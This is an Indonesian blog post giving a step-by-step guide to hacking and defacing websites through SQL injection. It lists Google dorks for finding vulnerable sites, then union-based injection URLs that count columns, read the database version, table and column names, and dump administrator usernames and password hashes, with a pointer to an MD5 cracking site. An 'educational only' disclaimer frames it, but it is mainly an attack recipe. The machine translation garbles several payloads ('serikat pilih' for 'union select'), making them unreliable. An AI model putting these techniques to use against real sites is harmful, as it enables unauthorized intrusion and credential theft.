Satanasoft - begitu banyak metode peretasan website di kalangan hacker , tetapi metode ini merupakan metode klasik namun sekaligus menjadi andalan para hacker
PERHATIAN !!
1. Posting ini hanya untuk tujuan pendidikan
2. Saya mencoba untuk memberitahu Anda semua bagaimana hacker melakukan semua hal-hal semacam.
3. jangan gunakan artikel ini untuk tujuan ilegal.
4. jika ada yang mendapatkan truble setiap saya tidak bertanggung jawab untuk apa pun.
**PENGANTAR**
SQL berdiri untuk bahasa query struktural.
SQL injection adalah metode untuk hack website dengan menyuntikkan script sql di dalamnya.
SQL digunakan untuk berkomunikasi dengan database website.
# 1 Menemukan SQL injection situs rentan
GOOGLE dork yang terbaik
inurl:? index.php id =
inurl:? admin.php id =
inurl:? pages.php id =
inurl:? pages.php id =
copy dan paste salah satu script di Google seperti inurl:? id = index.php
#2 Membuka situs web apapun
seperti ==> www.target.com/index.php?id=1
#3 Sekarang Anda harus menambahkan ( ') pada akhir URL
seperti ==> www.target.com/index.php?id=1 '
jika Anda mendapatkan error seperti ### Anda memiliki kesalahan pada MYSQL ###
website ini rentan terhadap injeksi sql.
#4 Sekarang kita harus mencari jumlah kolom
www.target.com/index.php?id=1 order by 10-- (ERROR)
www.target.com/index.php?id=1 order by 9-- (ERROR)
www.target.com/index.php?id=1 order by 8-- (ERROR)
www.target.com/index.php?id=1 order by 7-- (NO ERROR)
jumlah kolom 7 tidak menunjukkan acara apapun sehingga kita dapat dengan mudah mengatakan jumlah kolom 7
#5 Sekarang kita harus menemukan kolom rentan
serikat www.target.com/index.php?id=1 pilih 1,2,3,4,5,6,7--
jika menunjukkan angka 2 kolom maka rentan adalah 2
#6 kita harus menemukan versi database
www.target.com/index.php?id=1 serikat pilih 1, @@ version, 3,4,5,6,7--
Mengganti kolom rentan dengan "@@ version"
jika menunjukkan versi 5.1 log maka untuk bisa melanjutkan ke langkah berikutnya
#7 Sekarang menemukan nama database
serikat www.target.com/index.php?id=1 pilih 1group_concat (schema_name), 3,4,5,6,7 dari information_schema.schemata--
ia akan menampilkan nama data base biarkan nama data base adalah "dunia"
#8 Sekarang menemukan nama semua tabel
union www.target.com/index.php?id=1 pilih 1, concat (table_name), 3,4,5,6,7 dari information_schema.tables mana table_schema = database yang () -
ia akan menampilkan banyak nama tabel kita harus menemukan hanya admin atau pengguna jenis nama tabel
biarkan kita menemukan nama tabel "administrator"
#9 Sekarang kita harus mencari nama kolom
union www.target.com/index.php?id=1 pilih 1, concat (column_name), 3,4,5,6,7 dari information_schema.columns mana table_schema = database yang ()
kita semua melihat banyak tidak ada nama kolom kita hanya harus menemukan user_name dan password
biarkan kita memiliki nama dua kolom user_name dan pass_word.
#10 Sekarang menemukan password dari user_name
www.target.com/index.php?id=1 serikat pilih 1, concat (user_name, 0x3a, pass_word), 3,4,5,6,7 dari world.administrator
ia akan menampilkan username dan password
ia akan menampilkan password terenkripsi kita harus memiliki untuk mendekripsi
untuk decryted password saya direkomendasikan digunakan www.md5decypter.co.uk
NB :
1. posting ini hanya untuk tujuan pendidikan
2. Aku mencoba untuk informasi bagaimana hacker untuk semua jenis ini hacking.
3. jangan gunakan artical ini untuk tujuan ilegal.
4. jika ada yang mendapatkan truble setiap saya tidak bertanggung jawab untuk apa pun.
0 Response to "Cara Deface Menggunakan SQL Injection Ampuh"
Posting Komentar